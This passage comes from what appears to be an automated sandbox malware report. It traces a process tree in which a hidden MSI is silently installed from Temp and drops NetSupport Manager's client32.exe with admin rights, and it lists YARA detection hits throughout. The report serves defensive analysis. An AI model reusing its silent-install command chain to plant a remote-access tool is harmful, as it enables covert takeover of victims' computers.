                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.114047457566.000000000B674000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.114023155070.0000000008E21000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.114047735822.000000000B674000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.114023155070.0000000008C31000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.114048065766.0000000005BCB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:20:53:37
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0x950000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:20:53:38
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0x1a0000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:20:53:38
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0xb0000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:20:53:38
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0xaf0000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:11
                                                                                        Start time:20:53:38
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0xd60000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:20:53:39
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0xac0000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:13
                                                                                        Start time:20:53:39
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0xeb0000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:20:53:39
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0x200000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:15
                                                                                        Start time:20:53:39
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0xa20000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:16
                                                                                        Start time:20:53:39
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0xc40000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:19
                                                                                        Start time:20:53:52
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\vrep.msi" /quiet
                                                                                        Imagebase:0x6c0000
                                                                                        File size:59'904 bytes
                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000013.00000003.114081150460.000000000297D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000013.00000003.114080468749.0000000002958000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000013.00000003.114080518397.0000000002959000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000013.00000003.114080181911.0000000002968000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000013.00000003.114080266581.000000000296F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000013.00000003.114080419408.0000000002952000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000013.00000003.114080859440.0000000002970000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000013.00000003.114081033705.0000000002978000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000013.00000003.114079820477.0000000002949000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000013.00000003.114080026944.000000000294C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000013.00000003.114078859397.0000000002945000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000013.00000002.114313505526.000000000290A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:20
                                                                                        Start time:20:53:53
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                        Imagebase:0x7ff728190000
                                                                                        File size:69'632 bytes
                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:21
                                                                                        Start time:20:53:55
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding F1F5193EAAA26C6686643ED3090C1E98
                                                                                        Imagebase:0x6c0000
                                                                                        File size:59'904 bytes
                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:22
                                                                                        Start time:20:53:58
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                                                                        Imagebase:0x7ff71cca0000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:23
                                                                                        Start time:20:53:58
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7c7080000
                                                                                        File size:875'008 bytes
                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:24
                                                                                        Start time:20:53:58
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\SysWOW64\attrib.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                                                                        Imagebase:0x700000
                                                                                        File size:19'456 bytes
                                                                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:25
                                                                                        Start time:20:53:58
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Installer\MSIF373.tmp
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Installer\MSIF373.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                                                                                        Imagebase:0x590000
                                                                                        File size:763'872 bytes
                                                                                        MD5 hash:0FCF65C63E08E77732224B2D5D959F13
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000019.00000000.114135501778.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000019.00000000.114135574095.0000000000637000.00000008.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF373.tmp, Author: Joe Security
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:26
                                                                                        Start time:20:53:59
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6A6FD5B6F4DA3E504B51BAF4C9444B82 E Global\MSI0000
                                                                                        Imagebase:0x6c0000
                                                                                        File size:59'904 bytes
                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:27
                                                                                        Start time:20:54:00
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Installer\MSIF985.tmp
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Installer\MSIF985.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                                                                                        Imagebase:0x8d0000
                                                                                        File size:763'872 bytes
                                                                                        MD5 hash:0FCF65C63E08E77732224B2D5D959F13
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001B.00000000.114151205351.0000000000977000.00000008.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001B.00000002.114157054506.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001B.00000000.114151145405.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001B.00000002.114157116679.0000000000977000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSIF985.tmp, Author: Joe Security
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:28
                                                                                        Start time:20:54:06
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe"
                                                                                        Imagebase:0x750000
                                                                                        File size:551'904 bytes
                                                                                        MD5 hash:FE7D9DC26FF1615C13722E0F2DD3B815
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001C.00000002.114215734060.00000000007BB000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001C.00000002.114215767889.00000000007CA000.00000004.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001C.00000000.114214596852.00000000007BB000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001C.00000000.114214666288.00000000007CA000.00000008.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 3%, ReversingLabs
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:29
                                                                                        Start time:20:54:06
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Installer\MSI1387.tmp
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Installer\MSI1387.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I *
                                                                                        Imagebase:0xfa0000
                                                                                        File size:763'872 bytes
                                                                                        MD5 hash:0FCF65C63E08E77732224B2D5D959F13
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001D.00000000.114217635476.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001D.00000002.114241948191.0000000001047000.00000004.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001D.00000000.114217707443.0000000001047000.00000008.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001D.00000002.114241895385.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI1387.tmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 3%, ReversingLabs
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:30
                                                                                        Start time:20:54:07
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:winst64.exe /q /q /ex /i
                                                                                        Imagebase:0x7ff679350000
                                                                                        File size:345'056 bytes
                                                                                        MD5 hash:96E987D909600D34DD70C55F56EB8869
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001E.00000000.114225718112.00007FF679386000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001E.00000002.114227744042.00007FF679386000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 3%, ReversingLabs
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:31
                                                                                        Start time:20:54:11
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Windows\Installer\MSI23E6.tmp
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Installer\MSI23E6.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EI
                                                                                        Imagebase:0xb50000
                                                                                        File size:763'872 bytes
                                                                                        MD5 hash:0FCF65C63E08E77732224B2D5D959F13
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001F.00000002.114270878224.0000000000BF7000.00000004.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001F.00000000.114259508895.0000000000BF7000.00000008.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001F.00000002.114270824312.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001F.00000000.114259441382.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI23E6.tmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 3%, ReversingLabs
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:32
                                                                                        Start time:20:54:11
                                                                                        Start date:22/11/2024
                                                                                        Path:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" /* *
                                                                                        Imagebase:0x1f0000
                                                                                        File size:120'288 bytes
                                                                                        MD5 hash:297EA82401ACBEAD6BA4B19880DF2B8C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000003.114561669687.0000000000A25000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.115179006644.0000000001266000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000003.115069209517.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.115177447611.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000003.115020632793.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000003.115114283610.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.115176196956.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000000.114260013532.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000003.115008463407.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000003.114263957183.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.115188136908.000000006CD4D000.00000004.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000003.115080634297.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.115180363377.00000000019DA000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000002.115177447611.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000003.115069209517.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000003.115045720905.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000003.115032887765.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000003.115080634297.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000003.115102203122.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000003.114561669687.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
